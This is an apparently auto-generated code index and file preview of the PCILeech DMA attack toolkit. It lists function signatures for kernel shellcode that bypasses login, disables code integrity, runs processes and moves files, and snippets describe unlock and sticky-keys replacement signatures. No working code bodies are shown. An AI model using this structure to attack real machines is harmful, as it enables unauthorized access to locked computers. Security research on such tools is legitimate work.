function VOID (line 303) | VOID GetData_VFS(PBYTE *ppb, PDWORD pcb)
function VOID (line 520) | VOID GetData_PSCMD_KERNEL(PBYTE *ppb, PDWORD pcb)
function VOID (line 739) | VOID GetData_PSCMD_USER(PBYTE *ppb, PDWORD pcb)
function VOID (line 868) | VOID c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/wx64_common.c
function DWORD (line 10) | DWORD HashROR13A(_In_ LPCSTR sz)
function QWORD (line 21) | QWORD PEGetProcAddressH(_In_ QWORD hModule, _In_ DWORD dwProcNameH)
function QWORD (line 49) | QWORD KernelGetModuleBase(_In_ PKERNEL_FUNCTIONS fnk, _In_ LPSTR szModul...
function VOID (line 71) | VOID InitializeKernelFunctions(_In_ QWORD qwNtosBase, _Out_ PKERNEL_FUNC...
function DWORD (line 105) | DWORD PEGetImageSize(_In_ QWORD hModule)
function VOID (line 114) | VOID CommonSleep(_In_ PKERNEL_FUNCTIONS fnk, _In_ DWORD ms)
function BOOL (line 120) | BOOL _WriteLargeOutput_WaitForAck(_In_ PKERNEL_FUNCTIONS fnk, _In_ PKMDD...
function BOOL (line 130) | BOOL WriteLargeOutput_WaitNext(_In_ PKERNEL_FUNCTIONS fnk, _In_ PKMDDATA...
function VOID (line 140) | VOID WriteLargeOutput_Finish(_In_ PKERNEL_FUNCTIONS fnk, _In_ PKMDDATA pk)
FILE: pcileech_shellcode/wx64_common.h
type QWORD (line 14) | typedef unsigned __int64 QWORD, *PQWORD;
type UCHAR (line 15) | typedef UCHAR KIRQL;
type KIRQL (line 16) | typedef KIRQL *PKIRQL;
type _EPROCESS (line 17) | struct _EPROCESS
type _ETHREAD (line 18) | struct _ETHREAD
type KMDDATA (line 34) | typedef struct tdKMDDATA {
type EXEC_IO (line 71) | typedef struct tdEXEC_IO {
type SYSTEM_MODULE_INFORMATION_ENTRY (line 89) | typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
type SYSTEM_MODULE_INFORMATION (line 104) | typedef struct _SYSTEM_MODULE_INFORMATION {
type UNICODE_STRING (line 110) | typedef struct _UNICODE_STRING {
type ANSI_STRING (line 116) | typedef struct _ANSI_STRING {
type IO_STATUS_BLOCK (line 122) | typedef struct _IO_STATUS_BLOCK {
type OBJECT_ATTRIBUTES (line 130) | typedef struct _OBJECT_ATTRIBUTES {
type OBJECT_ATTRIBUTES (line 138) | typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;
type SYSTEM_INFORMATION_CLASS (line 149) | typedef enum _SYSTEM_INFORMATION_CLASS {
type CCHAR (line 154) | typedef CCHAR KPROCESSOR_MODE;
type MODE (line 156) | typedef enum _MODE {
type MEMORY_CACHING_TYPE (line 162) | typedef enum _MEMORY_CACHING_TYPE {
type KERNEL_FUNCTIONS (line 174) | typedef struct tdKERNEL_FUNCTIONS {
FILE: pcileech_shellcode/wx64_driverinfo.c
function VOID (line 15) | VOID ActionDefault(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk)
function VOID (line 48) | VOID ActionDetails(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk)
function VOID (line 79) | VOID c_EntryPoint(_In_ PKMDDATA pk)
FILE: pcileech_shellcode/wx64_driverload_svc.c
type KERNEL_FUNCTIONS2 (line 21) | typedef struct tdKERNEL_FUNCTIONS2 {
function VOID (line 48) | VOID InitializeKernelFunctions2(_In_ QWORD qwNtosBase, _Out_ PKERNEL_FUN...
function NTSTATUS (line 67) | NTSTATUS DriverRegGetImagePath(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS ...
function LPWSTR (line 96) | LPWSTR DriverRegGetImageNameFromPath(LPWSTR wszSrc)
function VOID (line 111) | VOID DriverRegSetServiceKeys(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fn...
function NTSTATUS (line 134) | NTSTATUS DriverRegCreateService(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS...
function QWORD (line 166) | QWORD GetAddr_g_CiEnabled(QWORD qwAddrModuleCi)
function NTSTATUS (line 196) | NTSTATUS DriverLoadByServiceName(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTION...
function NTSTATUS (line 212) | NTSTATUS DriverLoadByImagePath(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS ...
function VOID (line 229) | VOID c_EntryPoint(_In_ PKMDDATA pk)
FILE: pcileech_shellcode/wx64_driverunload.c
function VOID (line 17) | VOID c_EntryPoint(_In_ PKMDDATA pk)
FILE: pcileech_shellcode/wx64_exec_user_c.c
type QWORD (line 31) | typedef unsigned __int64 QWORD, *PQWORD;
type USERSHELL_BUFFER_IO (line 36) | typedef struct tUSERSHELLBUFFERIO {
type USERSHELL_CONFIG (line 44) | typedef struct tdUserShellConfig {
type USERSHELL_FUNCTIONS (line 60) | typedef struct tdUserShellFunctions {
type USERSHELL_DATA (line 117) | typedef struct tdUserShellData {
function DWORD (line 131) | DWORD HashROR13A(_In_ LPCSTR sz)
function PVOID (line 142) | PVOID PEGetProcAddressH(_In_ HMODULE hModuleIn, _In_ DWORD dwProcNameH)
function VOID (line 166) | VOID UserShellInitializeFunctions(_In_ HMODULE hModuleKernel32, _Out_ PU...
function BOOL (line 184) | BOOL UserShellIsProcessRunning(PUSERSHELL_DATA pd)
function VOID (line 190) | VOID UserShellCleanup(PUSERSHELL_DATA pd)
function BOOL (line 207) | BOOL UserShellExec(_Inout_ PUSERSHELL_DATA pd)
function VOID (line 231) | VOID UserShellThreadWriter(PUSERSHELL_DATA pd)
function VOID (line 257) | VOID UserShellThreadReader(PUSERSHELL_DATA pd)
function VOID (line 280) | VOID c_EntryPoint(PBYTE pb, ULONG_PTR lpBaseKernel32)
FILE: pcileech_shellcode/wx64_filepull.c
function VOID (line 22) | VOID c_EntryPoint(_In_ PKMDDATA pk)
FILE: pcileech_shellcode/wx64_filepush.c
function VOID (line 21) | VOID c_EntryPoint(_In_ PKMDDATA pk)
FILE: pcileech_shellcode/wx64_pagesignature.c
type SIGNATUREPTE (line 14) | typedef struct tdSignaturePTE {
type DRIVER_EXTENSION (line 22) | typedef struct _DRIVER_EXTENSION {
type DRIVER_OBJECT (line 29) | typedef struct _DRIVER_OBJECT {
type KERNEL_FUNCTIONS2 (line 53) | typedef struct tdKERNEL_FUNCTIONS2 {
function VOID (line 66) | VOID InitializeKernelFunctions2(_In_ QWORD qwNtosBase, _Out_ PKERNEL_FUN...
function QWORD (line 76) | QWORD GetPTE(_In_ PKERNEL_FUNCTIONS fnk, _In_ QWORD qwVA, _Out_opt_ QWOR...
function VOID (line 116) | VOID PageTable_CreateSignature(_In_ PKERNEL_FUNCTIONS fnk, _In_ QWORD qw...
function PVOID (line 143) | PVOID PageTable_GetAddrMajorFunction(_Inout_ PKMDDATA pk, _In_ PKERNEL_F...
function VOID (line 157) | VOID c_EntryPoint(_In_ PKMDDATA pk)
FILE: pcileech_shellcode/wx64_pscreate.c
type LOCK_OPERATION (line 29) | typedef enum _LOCK_OPERATION {
type MM_PAGE_PRIORITY (line 35) | typedef enum _MM_PAGE_PRIORITY {
type MEMORY_CACHING_TYPE_ORIG (line 41) | typedef enum _MEMORY_CACHING_TYPE_ORIG {
type KAPC_ENVIRONMENT (line 45) | typedef enum _KAPC_ENVIRONMENT {
type KAPC_STATE (line 52) | typedef struct _KAPC_STATE {
type KAPC (line 66) | typedef struct _KAPC {
type CLIENT_ID (line 83) | typedef struct _CLIENT_ID {
type CLIENT_ID (line 87) | typedef CLIENT_ID *PCLIENT_ID;
type SYSTEM_THREAD_INFORMATION (line 89) | typedef struct SYSTEM_THREAD_INFORMATION {
type SYSTEM_PROCESS_INFORMATION (line 103) | typedef struct _SYSTEM_PROCESS_INFORMATION {
type USERSHELL_CONFIG (line 119) | typedef struct tdUserShellConfig {
type KERNEL_FUNCTIONS2 (line 127) | typedef struct tdKERNEL_FUNCTIONS2 {
function VOID (line 225) | VOID InitializeKernelFunctions2(_In_ QWORD qwNtosBase, _Out_ PKERNEL_FUN...
function VOID (line 255) | VOID GetUserExecShellcode(_In_ PKMDDATA pk, _Out_ PBYTE *ppb, _Out_ PDWO...
function VOID (line 382) | VOID GetUserExecShellcode(_In_ PKMDDATA pk, _Out_ PBYTE *ppb, _Out_ PDWO...
function NTSTATUS (line 393) | NTSTATUS IntializeUserModeCode(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS ...
function QWORD (line 424) | QWORD SetupConsoleBufferUserMode(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTION...
function VOID (line 464) | VOID KernelApcRoutine(_In_ struct _KAPC *Apc, _Inout_ PVOID *NormalRouti...
function VOID (line 483) | VOID ActionWaitForExit(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk)
function PKAPC_STATE (line 504) | PKAPC_STATE GetKApcState(_In_ PEPROCESS pEProcess, _In_ PETHREAD pEThread)
function BOOLEAN (line 518) | BOOLEAN GetKApcIsAlertable(_In_ PEPROCESS pEProcess, _In_ PETHREAD pEThr...
function PETHREAD (line 528) | PETHREAD GetPEThread(_In_ PKERNEL_FUNCTIONS fnk, _In_ PKERNEL_FUNCTIONS2...
function VOID (line 579) | VOID ActionDefault_QueueApcState(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTION...
function VOID (line 642) | VOID ActionDefault(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _In_ PK...
function NTSTATUS (line 721) | NTSTATUS GetProcessNameFromPid(_In_ PKERNEL_FUNCTIONS fnk, _In_ PKERNEL_...
function NTSTATUS (line 735) | NTSTATUS GetPidFromPsName(_In_ PKERNEL_FUNCTIONS fnk, _In_ PKERNEL_FUNCT...
function VOID (line 774) | VOID c_EntryPoint(_In_ PKMDDATA pk)
FILE: pcileech_shellcode/wx64_pskill.c
type CLIENT_ID (line 15) | typedef struct _CLIENT_ID {
type CLIENT_ID (line 19) | typedef CLIENT_ID *PCLIENT_ID;
type KERNEL_FUNCTIONS2 (line 27) | typedef struct tdKERNEL_FUNCTIONS2 {
function VOID (line 43) | VOID InitializeKernelFunctions2(_In_ QWORD qwNtosBase, _Out_ PKERNEL_FUN...
function VOID (line 57) | VOID c_EntryPoint(_In_ PKMDDATA pk)
FILE: pcileech_shellcode/wx64_pslist.c
type KERNEL_FUNCTIONS2 (line 15) | typedef struct tdKERNEL_FUNCTIONS2 {
function VOID (line 29) | VOID InitializeKernelFunctions2(_In_ QWORD qwNtosBase, _Out_ PKERNEL_FUN...
type SYSTEM_PROCESS_INFORMATION (line 41) | typedef struct _SYSTEM_PROCESS_INFORMATION {
function NTSTATUS (line 56) | NTSTATUS GetProcessNameFromPid(_In_ PKERNEL_FUNCTIONS fnk, _In_ PKERNEL_...
function NTSTATUS (line 70) | NTSTATUS ActionDefault(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _In...
function VOID (line 121) | VOID c_EntryPoint(_In_ PKMDDATA pk)
FILE: pcileech_shellcode/wx64_stage3_c.c
type QWORD (line 9) | typedef unsigned __int64 QWORD, *PQWORD;
type __int64 (line 10) | typedef __int64 PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS;
type CLIENT_ID (line 14) | typedef struct _CLIENT_ID {
type CLIENT_ID (line 18) | typedef CLIENT_ID *PCLIENT_ID;
type _IRQL_requires_same_ (line 20) | typedef _IRQL_requires_same_ _Function_class_(KSTART_ROUTINE)
type KSTART_ROUTINE (line 23) | typedef KSTART_ROUTINE *PKSTART_ROUTINE;
type UNICODE_STRING (line 25) | typedef struct _UNICODE_STRING {
type UNICODE_STRING (line 30) | typedef UNICODE_STRING *PUNICODE_STRING;
type OBJECT_ATTRIBUTES (line 32) | typedef struct _OBJECT_ATTRIBUTES {
type OBJECT_ATTRIBUTES (line 40) | typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;
type CONST (line 41) | typedef CONST OBJECT_ATTRIBUTES
type MEMORY_CACHING_TYPE (line 43) | typedef enum _MEMORY_CACHING_TYPE {
type PHYSICAL_MEMORY_RANGE (line 53) | typedef struct _PHYSICAL_MEMORY_RANGE {
type MODE (line 58) | typedef enum _MODE {
type NTOS (line 82) | typedef struct tdNTOS {
type KMDDATA (line 145) | typedef struct tdKMDDATA {
function DWORD (line 182) | DWORD HashROR13A(_In_ LPCSTR sz)
function QWORD (line 199) | QWORD PEGetProcAddressH(_In_ QWORD hModule, _In_ DWORD dwProcNameH)
function VOID (line 226) | VOID stage3_c_EntryPoint(PKMDDATA pk)
function VOID (line 275) | VOID stage3_c_MainCommandLoop(PKMDDATA pk)
FILE: pcileech_shellcode/wx64_umd_exec_c.c
type QWORD (line 19) | typedef unsigned __int64 QWORD, *PQWORD;
type USERSHELL_BUFFER_IO (line 54) | typedef struct tUSERSHELLBUFFERIO {
type UMD_EXEC_CONTEXT_HANDLES (line 62) | typedef struct tdUMD_EXEC_CONTEXT_HANDLES {
type UMD_EXEC_CONTEXT_FULL (line 69) | typedef struct tdUMD_EXEC_CONTEXT_FULL {
function BOOL (line 142) | BOOL UserShellIsProcessRunning(PUMD_EXEC_CONTEXT_FULL ctx)
function VOID (line 148) | VOID UserShellCleanup(PUMD_EXEC_CONTEXT_FULL ctx)
function BOOL (line 165) | inline BOOL UserShellExec(PUMD_EXEC_CONTEXT_FULL ctx)
function VOID (line 190) | VOID UserShellThreadWriter(PUMD_EXEC_CONTEXT_FULL ctx)
function VOID (line 215) | VOID UserShellThreadReader(PUMD_EXEC_CONTEXT_FULL ctx)
function VOID (line 238) | VOID c_EntryPoint(PUMD_EXEC_CONTEXT_FULL ctx)
FILE: pcileech_shellcode/wx64_unlock.c
type __int64 (line 22) | typedef __int64 PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS;
type PHYSICAL_MEMORY_RANGE (line 24) | typedef struct _PHYSICAL_MEMORY_RANGE {
type IDT_DESCRIPTOR (line 30) | typedef struct _IDT_DESCRIPTOR {
type IDTR (line 36) | typedef struct _IDTR {
type KERNEL_FUNCTIONS2 (line 46) | typedef struct tdKERNEL_FUNCTIONS2 {
function VOID (line 76) | VOID InitializeKernelFunctions2(_In_ QWORD qwNtosBase, _Out_ PKERNEL_FUN...
type SIGNATURE_CHUNK (line 94) | typedef struct tdSignatureChunk {
type SIGNATURE (line 100) | typedef struct tdSignature {
function NTSTATUS (line 110) | NTSTATUS Unlock_FindAndPatch(_In_ PKERNEL_FUNCTIONS2 fnk2, _Inout_ PBYTE...
function NTSTATUS (line 133) | NTSTATUS Unlock(_In_ QWORD qwAddrNtosBase)
function VOID (line 412) | VOID c_EntryPoint(_In_ PKMDDATA pk)
FILE: pcileech_shellcode/wx64_vfs.c
type VFS_OPERATION (line 35) | typedef struct tdVFS_OPERATION {
type VFS_RESULT_FILEINFO (line 46) | typedef struct tdVFS_RESULT_FILEINFO {
type FILE_BOTH_DIR_INFORMATION (line 61) | typedef struct _FILE_BOTH_DIR_INFORMATION {
function NTSTATUS (line 89) | NTSTATUS VfsWrite(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _In_ PVF...
function NTSTATUS (line 113) | NTSTATUS VfsRead(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _In_ PVFS...
function NTSTATUS (line 134) | NTSTATUS VfsList(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _In_ PVFS...
function NTSTATUS (line 181) | NTSTATUS VfsCreate(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _In_ PV...
function NTSTATUS (line 198) | NTSTATUS VfsDelete(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _In_ PV...
function VOID (line 215) | VOID c_EntryPoint(_In_ PKMDDATA pk)
FILE: usb3380_flash/linux/pcileech_flash.c
function _action_flash_verify (line 52) | static int _action_flash_verify(unsigned char *pbar0)
function _action_flash_write (line 69) | static void _action_flash_write(unsigned char *pbar0)
function _action_flash_writeverify (line 91) | static int _action_flash_writeverify(unsigned char *pbar0)
function _action_flash_2 (line 124) | static int _action_flash_2(struct pci_dev *pdev)
function _action_flash_1 (line 170) | static int _action_flash_1(void) {
function pcileech_flash_init (line 192) | static int pcileech_flash_init(void) {
function pcileech_flash_exit (line 197) | static void pcileech_flash_exit(void) {
FILE: usb3380_flash/windows/USB3380Flash/USB3380Flash.c
function _action_flash_verify (line 26) | static int _action_flash_verify(unsigned char *pbar0)
function _action_flash_write (line 43) | static void _action_flash_write(unsigned char *pbar0)
function _action_flash_writeverify (line 65) | static int _action_flash_writeverify(unsigned char *pbar0)
function NTSTATUS (line 98) | NTSTATUS _EvtDevicePrepareHardware(_In_ WDFDEVICE Device, _In_ WDFCMRESL...
function NTSTATUS (line 135) | NTSTATUS _EvtDeviceAdd(_In_ WDFDRIVER Driver, _Inout_ PWDFDEVICE_INIT De...
function NTSTATUS (line 146) | NTSTATUS _EvtDeviceAdd_FlashDisable(_In_ WDFDRIVER Driver, _Inout_ PWDFD...
function NTSTATUS (line 153) | NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_ST...
FILE: usb3380_flash/windows/USB3380Flash_Installer/installer.c
function BOOL (line 86) | BOOL InsertCertificate(_In_ PCCERT_CONTEXT pCert)
function BOOL (line 97) | BOOL DeleteCertificate(_In_ PCCERT_CONTEXT pCert)
function BOOL (line 115) | BOOL RegistrySetDisableDriver(BOOL isDisable) {
function main (line 126) | int main(_In_ int argc, _In_ char* argv[])
Condensed preview — 189 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (1,817K chars).
[
{
"path": ".gitignore",
"chars": 171,
"preview": "/.vs\n/files/pcileech\n/files/lib\n/files/temp\n/files/x86/lib\n/files/USB3380Flash\n/files/USB3380Flash_installer\n*.bin\n*.co"
},
{
"path": "LICENSE",
"chars": 34523,
"preview": " GNU AFFERO GENERAL PUBLIC LICENSE\n Version 3, 19 November 2007\n\n Copyright (C)"
},
{
"path": "files/Certs/readme.txt",
"chars": 592,
"preview": "Example commands for generating test certificates used for gRPC mTLS remote connections.\n\nPassword to the .pfx files: te"
},
{
"path": "files/agent-find-rwx.py",
"chars": 1572,
"preview": "# Example file to demonstrate remote python functionality with the LeechAgent.\n#\n# Example:\n# pcileech.exe -device <devi"
},
{
"path": "files/pcileech.txt",
"chars": 84,
"preview": "Download the latest binaries from https://github.com/ufrisk/pcileech/releases/latest"
},
{
"path": "files/pcileech_gensig.cfg",
"chars": 11192,
"preview": "# Configuration data for the Windows 8.1/10/2012R2/2016 pagetable hijack signature generator.\n# The signatures for the p"
},
{
"path": "files/signature_info.txt",
"chars": 4142,
"preview": "Signature Guide for Search/Patch signatures and Kernel Module signatures\n==============================================="
},
{
"path": "files/stickykeys_cmd_win.sig",
"chars": 829,
"preview": "# replace sethc.exe with cmd.exe in memory on Windows\n# Signatur for PCILeech version 1.1\n# syntax: see signature_info.t"
},
{
"path": "files/unlock_macos.sig",
"chars": 309,
"preview": "# unlock signatures for macOS\n# syntax: see signature_info.txt for more information.\n#\n#\n# CFOpenDirectory!ODRecordVerif"
},
{
"path": "files/unlock_win10x64.sig",
"chars": 4211,
"preview": "# Unlock Signatures for Local and AD Accounts for Windows 10 x64 version\n#\n# Method 1: (faster):\n# 1.1 check pid of lsas"
},
{
"path": "files/unlock_win10x86.sig",
"chars": 3595,
"preview": "# Unlock Signatures for Local and AD Accounts for Windows 10 x86 version\n#\n# Method 1: (faster):\n# 1.1 check pid of lsas"
},
{
"path": "files/unlock_win11x64.sig",
"chars": 2280,
"preview": "# Unlock Signatures for Local and AD Accounts for Windows 11 x64 version\n#\n# Method 1: (faster):\n# 1.1 check pid of lsas"
},
{
"path": "files/unlock_win8x64.sig",
"chars": 434,
"preview": "# unlock signatures for Windows 8.1\n# syntax: see signature_info.txt for more information.\n#\n#\n# signature for Windows 8"
},
{
"path": "files/unlock_winvistax64.sig",
"chars": 304,
"preview": "# unlock signatures for Windows Vista x64 version\n# syntax: see signature_info.txt for more information.\n#\n#\n# signature"
},
{
"path": "files/win7x64.kmd",
"chars": 2738,
"preview": "# signatures for Windows 7 x64 version\n#\n#\n# ntfs.sys signed on 2010-11-20 14:33:45 (MJ_CREATE) | (WIN7SP1-INSTALL)\n7F0,"
},
{
"path": "files/winvistax64.kmd",
"chars": 2376,
"preview": "# unlock signatures for Windows Vista x64 version\n# syntax: see signature_info.txt for more information.\n#\n# NB! stage2 "
},
{
"path": "includes/dokan.h",
"chars": 45688,
"preview": "/*\n Dokan : user-mode file system library for Windows\n\n Copyright (C) 2015 - 2019 Adrien J. <liryna.stark@gmail.com> a"
},
{
"path": "includes/fileinfo.h",
"chars": 48371,
"preview": "/*\n Dokan : user-mode file system library for Windows\n\n Copyright (C) 2015 - 2019 Adrien J. <liryna.stark@gmail.com> a"
},
{
"path": "includes/leechcore.h",
"chars": 26108,
"preview": "// leechcore.h : external header of the LeechCore library.\n//\n// LeechCore is a library which abstracts away reading and"
},
{
"path": "includes/leechgrpc.h",
"chars": 12869,
"preview": "// leechgrpc.h : external header of the libleechgrpc library.\n//\n// libleechgrpc is a library used by LeechCore to commu"
},
{
"path": "includes/libpdbcrust.h",
"chars": 2777,
"preview": "// C library wrapper around the rust PDB crate and related useful utilities.\n//\n// (c) Ulf Frisk, 2023\n// Author: Ulf Fr"
},
{
"path": "includes/public.h",
"chars": 17800,
"preview": "/*\n Dokan : user-mode file system library for Windows\n\n Copyright (C) 2017 - 2021 Google, Inc.\n Copyright (C) 2015 - "
},
{
"path": "includes/vmmdll.h",
"chars": 128226,
"preview": "// vmmdll.h : header file to include in projects that use vmm.dll / vmm.so\n// \n// Please also consult the guide at: http"
},
{
"path": "includes/vmmyara.h",
"chars": 11435,
"preview": "// vmmyara.h : External headers of the YARA API wrapper for MemProcFS.\n//\n// (c) Ulf Frisk, 2023\n// Author: Ulf Frisk, p"
},
{
"path": "pcileech/Makefile",
"chars": 1196,
"preview": "CC=gcc\nCFLAGS +=-I. -I../includes -D LINUX -D_GNU_SOURCE -D_FILE_OFFSET_BITS=64 -pthread\nCFLAGS += -fPIE -fPIC -fstack"
},
{
"path": "pcileech/Makefile.macos",
"chars": 2110,
"preview": "CC=clang\nCFLAGS += -I. -I../includes -D MACOS -D _GNU_SOURCE -D _FILE_OFFSET_BITS=64 -pthread\nCFLAGS += -fPIE -fPIC -fst"
},
{
"path": "pcileech/charutil.c",
"chars": 56995,
"preview": "// charutil.c : implementation of various character/string utility functions.\n//\n// (c) Ulf Frisk, 2021-2026\n// Author: "
},
{
"path": "pcileech/charutil.h",
"chars": 16328,
"preview": "// charutil.h : definitions of various character/string utility functions.\n//\n// (c) Ulf Frisk, 2021-2026\n// Author: Ulf"
},
{
"path": "pcileech/device.c",
"chars": 8294,
"preview": "// device.c : implementation related to hardware devices.\n//\n// (c) Ulf Frisk, 2016-2026\n// Author: Ulf Frisk, pcileech@"
},
{
"path": "pcileech/device.h",
"chars": 2471,
"preview": "// device.h : definitions related to the hardware devices.\n//\n// (c) Ulf Frisk, 2016-2026\n// Author: Ulf Frisk, pcileech"
},
{
"path": "pcileech/executor.c",
"chars": 26608,
"preview": "// executor.c : implementation related 'code execution' and 'console redirect' functionality.\n//\n// (c) Ulf Frisk, 2016-"
},
{
"path": "pcileech/executor.h",
"chars": 2343,
"preview": "// executor.h : definitions related to 'code execution' and 'console redirect' functionality.\n//\n// (c) Ulf Frisk, 2016-"
},
{
"path": "pcileech/extra.c",
"chars": 21157,
"preview": "// extra.c : implementation related various extra functionality such as exploits.\n//\n// (c) Ulf Frisk, 2016-2026\n// Auth"
},
{
"path": "pcileech/extra.h",
"chars": 1656,
"preview": "// extra.h : definitions related to various extra functionality such as exploits.\n//\n// (c) Ulf Frisk, 2016-2026\n// Auth"
},
{
"path": "pcileech/help.c",
"chars": 54222,
"preview": "// help.c : implementation related to displaying help texts.\n//\n// (c) Ulf Frisk, 2016-2026\n// Author: Ulf Frisk, pcilee"
},
{
"path": "pcileech/help.h",
"chars": 292,
"preview": "// help.h : definitions related to displaying help texts.\n//\n// (c) Ulf Frisk, 2016-2026\n// Author: Ulf Frisk, pcileech@"
},
{
"path": "pcileech/kmd.c",
"chars": 94757,
"preview": "// kmd.c : implementation related to operating systems kernel modules functionality.\n//\n// (c) Ulf Frisk, 2016-2026\n// A"
},
{
"path": "pcileech/kmd.h",
"chars": 1593,
"preview": "// kmd.h : definitions related to operating systems kernel modules functionality.\n//\n// (c) Ulf Frisk, 2016-2026\n// Auth"
},
{
"path": "pcileech/memdump.c",
"chars": 16084,
"preview": "// memdump.c : implementation related to memory dumping functionality.\n//\n// (c) Ulf Frisk, 2016-2026\n// Author: Ulf Fri"
},
{
"path": "pcileech/memdump.h",
"chars": 1789,
"preview": "// memdump.h : definitions related to memory dumping functionality.\n//\n// (c) Ulf Frisk, 2016-2026\n// Author: Ulf Frisk,"
},
{
"path": "pcileech/mempatch.c",
"chars": 11575,
"preview": "// mempatch.c : implementation related to operating systems unlock/patch functionality.\n//\n// (c) Ulf Frisk, 2016-2026\n/"
},
{
"path": "pcileech/mempatch.h",
"chars": 699,
"preview": "// mempatch.h : definitions related to memory patch / operating system unlock functionality.\n//\n// (c) Ulf Frisk, 2016-2"
},
{
"path": "pcileech/ob/ob.h",
"chars": 46532,
"preview": "// ob.h : definitions related to the object manager and object manager collections.\n//\n// (c) Ulf Frisk, 2018-2025\n// Au"
},
{
"path": "pcileech/ob/ob_cachemap.c",
"chars": 8669,
"preview": "// ob_cachemap.c : implementation of object manager cached map functionality.\n//\n// The map (ObCacheMap) implements an e"
},
{
"path": "pcileech/ob/ob_core.c",
"chars": 5705,
"preview": "// ob_core.c : implementation of object manager core functionality.\n//\n// The object manager is a minimal non-threaded w"
},
{
"path": "pcileech/ob/ob_map.c",
"chars": 33645,
"preview": "// ob_map.c : implementation of object manager hashed map functionality.\n//\n// The map is a key-value map that may, as a"
},
{
"path": "pcileech/ob/ob_set.c",
"chars": 19235,
"preview": "// ob_set.c : implementation of object manager hashed value set functionality.\n//\n// The hashed value set (ObSet) provid"
},
{
"path": "pcileech/oscompatibility.c",
"chars": 14539,
"preview": "// oscompatibility.c : pcileech windows/linux compatibility layer.\n//\n// (c) Ulf Frisk, 2017-2026\n// Author: Ulf Frisk, "
},
{
"path": "pcileech/oscompatibility.h",
"chars": 12687,
"preview": "// oscompatibility.h : pcileech windows/linux compatibility layer.\n//\n// (c) Ulf Frisk, 2017-2026\n// Author: Ulf Frisk, "
},
{
"path": "pcileech/pcileech.c",
"chars": 18679,
"preview": "// pcileech.c : implementation of core pcileech functionality.\n//\n// (c) Ulf Frisk, 2016-2026\n// Author: Ulf Frisk, pcil"
},
{
"path": "pcileech/pcileech.h",
"chars": 9227,
"preview": "// pcileech.h : definitions for pcileech - dump memory and unlock computers with a USB3380 device using DMA.\n//\n// (c) U"
},
{
"path": "pcileech/pcileech.vcxproj",
"chars": 11933,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"15.0\" xmlns=\"http://schemas.micros"
},
{
"path": "pcileech/pcileech.vcxproj.filters",
"chars": 5466,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
},
{
"path": "pcileech/pcileech.vcxproj.user",
"chars": 2708,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"14.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "pcileech/shellcode.h",
"chars": 161541,
"preview": "// shellcode.h : default shellcode used by pcileech in default scenarios.\n//\n// (c) Ulf Frisk, 2016-2026\n// Author: Ulf "
},
{
"path": "pcileech/statistics.c",
"chars": 10889,
"preview": "// statistics.c : implementation of statistics related functionality.\n//\n// (c) Ulf Frisk, 2016-2026\n// Author: Ulf Fris"
},
{
"path": "pcileech/statistics.h",
"chars": 3474,
"preview": "// statistics.h : definitions of statistics related functionality.\n//\n// (c) Ulf Frisk, 2016-2026\n// Author: Ulf Frisk, "
},
{
"path": "pcileech/umd.c",
"chars": 13833,
"preview": "// umd.c : implementation related to various user-mode functionality supported\n// by MemProcFS / vmm.dll integra"
},
{
"path": "pcileech/umd.h",
"chars": 728,
"preview": "// umd.c : implementation related to various user-mode functionality supported\n// by the Memory Process File Sys"
},
{
"path": "pcileech/util.c",
"chars": 32374,
"preview": "// util.c : implementation of various utility functions.\n//\n// (c) Ulf Frisk, 2016-2026\n// Author: Ulf Frisk, pcileech@f"
},
{
"path": "pcileech/util.h",
"chars": 10582,
"preview": "// util.h : definitions of various utility functions.\n//\n// (c) Ulf Frisk, 2016-2026\n// Author: Ulf Frisk, pcileech@friz"
},
{
"path": "pcileech/version.h",
"chars": 1075,
"preview": "#define STRINGIZE2(s) #s\n#define STRINGIZE(s) STRINGIZE2(s)\n\n#define VERSION_MAJOR 4\n#define VERSION_MINOR"
},
{
"path": "pcileech/vfs.c",
"chars": 34408,
"preview": "// vfs.c : implementation of functions related to virtual file system support.\n//\n// (c) Ulf Frisk, 2017-2026\n// Author:"
},
{
"path": "pcileech/vfs.h",
"chars": 1340,
"preview": "// vfs.h : definitions related to virtual file system support.\n//\n// (c) Ulf Frisk, 2017-2026\n// Author: Ulf Frisk, pcil"
},
{
"path": "pcileech/vfslist.c",
"chars": 13086,
"preview": "// vfslist.h : definitions related to vfs directory listings.\n//\n// (c) Ulf Frisk, 2021-2026\n// Author: Ulf Frisk, pcile"
},
{
"path": "pcileech/vfslist.h",
"chars": 3055,
